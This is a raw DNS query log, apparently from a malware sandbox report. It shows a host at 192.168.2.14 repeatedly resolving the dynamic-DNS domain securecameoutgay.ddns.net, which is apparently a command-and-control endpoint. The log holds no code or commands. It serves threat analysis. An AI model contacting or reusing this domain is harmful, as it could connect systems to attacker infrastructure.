                                                    Oct 12, 2024 23:05:23.593106031 CEST192.168.2.148.8.8.80xba4fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.599859953 CEST192.168.2.148.8.8.80xba4fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.606415987 CEST192.168.2.148.8.8.80xba4fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.613127947 CEST192.168.2.148.8.8.80x2ff6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.620138884 CEST192.168.2.148.8.8.80x2ff6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.626913071 CEST192.168.2.148.8.8.80x2ff6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.633266926 CEST192.168.2.148.8.8.80x2ff6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.640047073 CEST192.168.2.148.8.8.80x2ff6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.647037029 CEST192.168.2.148.8.8.80x801dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.654155970 CEST192.168.2.148.8.8.80x801dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.660675049 CEST192.168.2.148.8.8.80x801dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.667180061 CEST192.168.2.148.8.8.80x801dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.673722982 CEST192.168.2.148.8.8.80x801dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.680531979 CEST192.168.2.148.8.8.80x5e09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.687530994 CEST192.168.2.148.8.8.80x5e09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.694518089 CEST192.168.2.148.8.8.80x5e09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.703355074 CEST192.168.2.148.8.8.80x5e09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.710830927 CEST192.168.2.148.8.8.80x5e09Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.717852116 CEST192.168.2.148.8.8.80xd9dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.724730015 CEST192.168.2.148.8.8.80xd9dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.732044935 CEST192.168.2.148.8.8.80xd9dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.739213943 CEST192.168.2.148.8.8.80xd9dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.745857954 CEST192.168.2.148.8.8.80xd9dbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.752207994 CEST192.168.2.148.8.8.80x424aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.758713961 CEST192.168.2.148.8.8.80x424aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.765306950 CEST192.168.2.148.8.8.80x424aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.771943092 CEST192.168.2.148.8.8.80x424aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.778559923 CEST192.168.2.148.8.8.80x424aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.785399914 CEST192.168.2.148.8.8.80x3a33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.792216063 CEST192.168.2.148.8.8.80x3a33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.800919056 CEST192.168.2.148.8.8.80x3a33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.808307886 CEST192.168.2.148.8.8.80x3a33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.814968109 CEST192.168.2.148.8.8.80x3a33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.821919918 CEST192.168.2.148.8.8.80x837fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.828906059 CEST192.168.2.148.8.8.80x837fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.835956097 CEST192.168.2.148.8.8.80x837fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.843072891 CEST192.168.2.148.8.8.80x837fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.850485086 CEST192.168.2.148.8.8.80x837fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.857424974 CEST192.168.2.148.8.8.80x260cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.863817930 CEST192.168.2.148.8.8.80x260cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.870795012 CEST192.168.2.148.8.8.80x260cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.877906084 CEST192.168.2.148.8.8.80x260cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.884565115 CEST192.168.2.148.8.8.80x260cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.894922018 CEST192.168.2.148.8.8.80x6329Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.901582956 CEST192.168.2.148.8.8.80x6329Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.910638094 CEST192.168.2.148.8.8.80x6329Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.920170069 CEST192.168.2.148.8.8.80x6329Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.928025007 CEST192.168.2.148.8.8.80x6329Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.935338020 CEST192.168.2.148.8.8.80x1d2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.942311049 CEST192.168.2.148.8.8.80x1d2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.949264050 CEST192.168.2.148.8.8.80x1d2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.958326101 CEST192.168.2.148.8.8.80x1d2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.964845896 CEST192.168.2.148.8.8.80x1d2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.971446037 CEST192.168.2.148.8.8.80x20a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.978153944 CEST192.168.2.148.8.8.80x20a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.986691952 CEST192.168.2.148.8.8.80x20a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:23.993338108 CEST192.168.2.148.8.8.80x20a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.001003981 CEST192.168.2.148.8.8.80x20a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.007622957 CEST192.168.2.148.8.8.80x4c95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.014234066 CEST192.168.2.148.8.8.80x4c95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.021445036 CEST192.168.2.148.8.8.80x4c95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.028126955 CEST192.168.2.148.8.8.80x4c95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.034838915 CEST192.168.2.148.8.8.80x4c95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.041873932 CEST192.168.2.148.8.8.80xb35dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.050223112 CEST192.168.2.148.8.8.80xb35dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.057491064 CEST192.168.2.148.8.8.80xb35dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.064392090 CEST192.168.2.148.8.8.80xb35dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.070943117 CEST192.168.2.148.8.8.80xb35dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.078349113 CEST192.168.2.148.8.8.80xea14Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.085105896 CEST192.168.2.148.8.8.80xea14Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.091782093 CEST192.168.2.148.8.8.80xea14Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.098542929 CEST192.168.2.148.8.8.80xea14Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.105664015 CEST192.168.2.148.8.8.80xea14Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.112559080 CEST192.168.2.148.8.8.80xbfd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.119328976 CEST192.168.2.148.8.8.80xbfd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.126374960 CEST192.168.2.148.8.8.80xbfd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.133244038 CEST192.168.2.148.8.8.80xbfd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.140221119 CEST192.168.2.148.8.8.80xbfd0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.147877932 CEST192.168.2.148.8.8.80x487Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.156264067 CEST192.168.2.148.8.8.80x487Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.163520098 CEST192.168.2.148.8.8.80x487Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.170500994 CEST192.168.2.148.8.8.80x487Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.177122116 CEST192.168.2.148.8.8.80x487Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.184313059 CEST192.168.2.148.8.8.80xb7d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.193480968 CEST192.168.2.148.8.8.80xb7d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.201212883 CEST192.168.2.148.8.8.80xb7d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.208223104 CEST192.168.2.148.8.8.80xb7d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.215281963 CEST192.168.2.148.8.8.80xb7d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.223004103 CEST192.168.2.148.8.8.80x32bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.230716944 CEST192.168.2.148.8.8.80x32bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.237607956 CEST192.168.2.148.8.8.80x32bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.246056080 CEST192.168.2.148.8.8.80x32bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.253969908 CEST192.168.2.148.8.8.80x32bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.260633945 CEST192.168.2.148.8.8.80xf45aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.267529011 CEST192.168.2.148.8.8.80xf45aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.274149895 CEST192.168.2.148.8.8.80xf45aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.281339884 CEST192.168.2.148.8.8.80xf45aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.288423061 CEST192.168.2.148.8.8.80xf45aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.295325994 CEST192.168.2.148.8.8.80xc4c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.301867962 CEST192.168.2.148.8.8.80xc4c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.308484077 CEST192.168.2.148.8.8.80xc4c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.315365076 CEST192.168.2.148.8.8.80xc4c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.322493076 CEST192.168.2.148.8.8.80xc4c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.329421997 CEST192.168.2.148.8.8.80x67a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.336632967 CEST192.168.2.148.8.8.80x67a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.343739986 CEST192.168.2.148.8.8.80x67a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.350691080 CEST192.168.2.148.8.8.80x67a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.357455015 CEST192.168.2.148.8.8.80x67a3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.364250898 CEST192.168.2.148.8.8.80xb83aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.371191978 CEST192.168.2.148.8.8.80xb83aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.378750086 CEST192.168.2.148.8.8.80xb83aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.385373116 CEST192.168.2.148.8.8.80xb83aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.392757893 CEST192.168.2.148.8.8.80xb83aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.399705887 CEST192.168.2.148.8.8.80xe77bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.406251907 CEST192.168.2.148.8.8.80xe77bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.412663937 CEST192.168.2.148.8.8.80xe77bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.419512987 CEST192.168.2.148.8.8.80xe77bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.427031994 CEST192.168.2.148.8.8.80xe77bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.434053898 CEST192.168.2.148.8.8.80x7618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.441091061 CEST192.168.2.148.8.8.80x7618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.447870970 CEST192.168.2.148.8.8.80x7618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.455493927 CEST192.168.2.148.8.8.80x7618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.462215900 CEST192.168.2.148.8.8.80x7618Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.470403910 CEST192.168.2.148.8.8.80xc992Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.476886034 CEST192.168.2.148.8.8.80xc992Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.483525991 CEST192.168.2.148.8.8.80xc992Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.490313053 CEST192.168.2.148.8.8.80xc992Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.497740984 CEST192.168.2.148.8.8.80xc992Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.504527092 CEST192.168.2.148.8.8.80x7c95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.511732101 CEST192.168.2.148.8.8.80x7c95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.518424988 CEST192.168.2.148.8.8.80x7c95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.526278973 CEST192.168.2.148.8.8.80x7c95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.533672094 CEST192.168.2.148.8.8.80x7c95Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.541038036 CEST192.168.2.148.8.8.80xb9e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.547987938 CEST192.168.2.148.8.8.80xb9e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.554879904 CEST192.168.2.148.8.8.80xb9e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.561681032 CEST192.168.2.148.8.8.80xb9e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.569663048 CEST192.168.2.148.8.8.80xb9e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.576363087 CEST192.168.2.148.8.8.80xc789Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.583304882 CEST192.168.2.148.8.8.80xc789Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.590162992 CEST192.168.2.148.8.8.80xc789Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.597047091 CEST192.168.2.148.8.8.80xc789Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.603744030 CEST192.168.2.148.8.8.80xc789Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.610515118 CEST192.168.2.148.8.8.80xe4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.617537975 CEST192.168.2.148.8.8.80xe4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.624161959 CEST192.168.2.148.8.8.80xe4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.631135941 CEST192.168.2.148.8.8.80xe4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.637986898 CEST192.168.2.148.8.8.80xe4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.645085096 CEST192.168.2.148.8.8.80xd2f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.652157068 CEST192.168.2.148.8.8.80xd2f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.658885956 CEST192.168.2.148.8.8.80xd2f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.665705919 CEST192.168.2.148.8.8.80xd2f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.672677994 CEST192.168.2.148.8.8.80xd2f3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.679414034 CEST192.168.2.148.8.8.80xfda9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.686384916 CEST192.168.2.148.8.8.80xfda9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.693463087 CEST192.168.2.148.8.8.80xfda9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.700258970 CEST192.168.2.148.8.8.80xfda9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.707035065 CEST192.168.2.148.8.8.80xfda9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.714220047 CEST192.168.2.148.8.8.80x41c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.721329927 CEST192.168.2.148.8.8.80x41c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.728461981 CEST192.168.2.148.8.8.80x41c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.735718012 CEST192.168.2.148.8.8.80x41c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.742453098 CEST192.168.2.148.8.8.80x41c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.748799086 CEST192.168.2.148.8.8.80xb330Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.755573034 CEST192.168.2.148.8.8.80xb330Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.761789083 CEST192.168.2.148.8.8.80xb330Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.768270016 CEST192.168.2.148.8.8.80xb330Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.774947882 CEST192.168.2.148.8.8.80xb330Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.782099009 CEST192.168.2.148.8.8.80x15aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.788592100 CEST192.168.2.148.8.8.80x15aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.796680927 CEST192.168.2.148.8.8.80x15aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.803136110 CEST192.168.2.148.8.8.80x15aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.809623003 CEST192.168.2.148.8.8.80x15aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.816261053 CEST192.168.2.148.8.8.80x2c04Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.822740078 CEST192.168.2.148.8.8.80x2c04Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.829250097 CEST192.168.2.148.8.8.80x2c04Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.835625887 CEST192.168.2.148.8.8.80x2c04Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.842397928 CEST192.168.2.148.8.8.80x2c04Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.849073887 CEST192.168.2.148.8.8.80x53d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.855768919 CEST192.168.2.148.8.8.80x53d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.862114906 CEST192.168.2.148.8.8.80x53d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.868592024 CEST192.168.2.148.8.8.80x53d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.875219107 CEST192.168.2.148.8.8.80x53d5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.881824017 CEST192.168.2.148.8.8.80xd559Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.888586044 CEST192.168.2.148.8.8.80xd559Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.895195007 CEST192.168.2.148.8.8.80xd559Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:24.901586056 CEST192.168.2.148.8.8.80xd559Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
